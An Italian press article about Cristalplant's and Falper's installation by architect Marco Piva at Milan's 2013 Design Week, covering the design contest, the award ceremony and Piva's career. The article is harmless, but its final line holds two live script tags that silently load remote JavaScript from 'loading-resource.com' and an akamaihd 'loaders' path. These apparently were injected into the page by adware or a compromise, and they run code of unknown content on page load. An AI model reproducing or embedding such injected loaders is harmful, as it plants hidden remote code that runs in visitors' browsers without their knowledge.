È ormai una tradizione quella che vede Cristalplant® fra i protagonisti del Fuori Salone che si svolge in occasione della Design Week (9/14 aprile 2013). La cornice scelta è sempre quella di Superstudio Più - Temporary Museum for New Design, che offre unʼopportunità di ricerca, qualità, innovazione come nessun altro contenitore.
Lʼinstallazione 2013 che Cristalplant® condividerà con Falper è stata firmata da Marco Piva, architetto e designer di fama internazionale.
La struttura dello spazio di Cristalplant® e Falper può idealmente essere divisa in due parti. I visitatori saranno infatti accolti allʼingresso da due monitor che raccontano le aziende, la giuria e i designers vincitori del concorso. Addentrandosi nellʼambiente si apre unʼarea dove saranno esposti i prototipi dei progetti vincitori, mentre alle pareti alcuni plasma presenteranno le proposte che hanno ricevuto le menzioni dʼonore.
Lʼintero perimetro è costituito da una serie di pannelli la cui disposizione, armonica ma non lineare, ricrea un “dinamismo metropolitano”. I giochi di lucee le proiezioni, che rendono lo scenario unico, accolgono i visitatori, i quali, come in un sogno, si ritroveranno protagonisti di una metropoli in continua evoluzione. Il bianco, colore del Cristalplant®, viene così plasmato e trasportato in unʼaltra dimensione. Con questo progetto si esce dagli schemi classici, volutamente, nel desiderio di raffigurare al meglio lo spirito dei giovani designer e della loro innovazione.
È così che lo spazio disegnato da Marco Piva è il palcoscenico dellʼeleganza e della contemporaneità, del loro incontro per mezzo della tecnologia, che enfatizza le qualità estetiche del prodotto e gli stili inconfondibili di Cristalplant® e Falper. Uno spazio mutante e flessibile, che rappresenta infinite possibilità dinamiche: degli spazi, delle forme e, soprattutto, dei designer di domani.
Lʼobiettivo del “Cristalplant® Design Contest 2013” era quello di coinvolgere i giovani designer, i quali hanno messo in gioco il loro spirito creativo per dare vita a prodotti dʼavanguardia, utilizzando il Cristalplant® come materiale base di prodotti ispirati allʼinconfondibile stile di Falper. I vincitori e le menzioni dʼonore per le due categorie proposte, ambiente bagno indoor e outdoor per il settore contract, saranno premiati, presso lo spazio Cristalplant® e Falper a Superstudio Più, il 10 aprile 2013 alle ore 19.00 alla presenza dei giurati e dei vertici aziendali. I progetti premiati saranno in seguito inseriti nel catalogo Falper.
Marco Piva è uno dei più affermati e apprezzati architetti a livello internazionale. La sua attività spazia dai grandi progetti architettonici alla progettazione dʼinterni, fino al disegno industriale. Dalla sua matita nascono infatti numerosi prodotti dei più noti nomi del design italiano. Il suo lavoro si distingue inoltre per lʼintensa attività di ricerca materica e tecnologica che conferisce alle sue soluzioni progettuali una forte libertà stilistica: gli oggetti si caricano di emozionalità e nuova simbologia, i colori contrastano ogni intellettualismo e rigidità. Per citare solo alcuni dei suoi progetti: Laguna Palace a Mestre, Port Palace a Montecarlo, Hotel Mirage a Kazan, T Hotel di Cagliari, a Dubai ha progettato lʼinnovativo complesso Porto Dubai.
<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>